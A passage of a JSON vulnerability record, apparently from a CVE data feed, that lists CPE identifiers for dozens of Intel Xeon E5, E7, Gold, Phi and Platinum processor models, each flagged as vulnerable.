"cpe:2.3:h:intel:xeon_e5:4669_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1630_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1630_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1680_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1680_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2403:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2403_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2407:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2407_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2408l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2420:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2420_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2438l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2440:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2440_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2448l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2448l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2470:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2470_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2608l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2608l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2623_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2623_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2820:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2850_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2860:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2870:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2870_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2880_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2890_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4807:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4860:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4860_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4870:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4870_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4880_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4890_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8837:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8850_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8857_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880l_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880l_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8894_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5115:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5118:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5119t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5120:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5120t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5122:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6128:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6132:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6134:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6134m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6136:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6140:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6140m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6144:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6146:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6148:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6148f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6150:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6152:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6154:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7210:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7210f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7230:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7230f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7235:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7250:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7250f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7285:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7290:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7290f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7295:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8153:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8156:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8158:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8164:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8168:*:*:*:*:*:*:*", 